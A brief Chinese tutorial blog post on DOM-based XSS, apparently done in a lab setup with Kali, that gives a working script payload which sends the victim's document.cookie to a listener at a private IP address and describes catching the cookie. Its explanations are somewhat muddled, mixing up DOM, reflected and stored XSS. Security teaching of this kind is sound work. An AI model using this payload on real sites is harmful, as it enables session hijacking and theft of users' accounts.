二十五、XSS跨站攻击-(5)DOM型跨站

2017-12-15  本文已影响0人  cybeyond
                                 目录

1.简介
2.利用DOM型xss获取cookie

1、简介

DOM型xss是一套JS和其他语言可调用的标准的API,即利用JavaScript跨平台的特性,通过调用DOM提供的相应接口执行相关功能。


图例

2、利用DOM型xss获取cookie

在“xss reflected”中测试存储型xss,在输入框中写入如下内容:

<script>var img=document.createElement("img");img.src="http://192.168.50.115:88/log?"+escape(document.cookie);</script>
//创建一个页面元素为img,其来源为src的地址

在kali上开启监听,然后点击提交,可以查看到cookie信息


查看监听结果
上一篇下一篇

猜你喜欢

热点阅读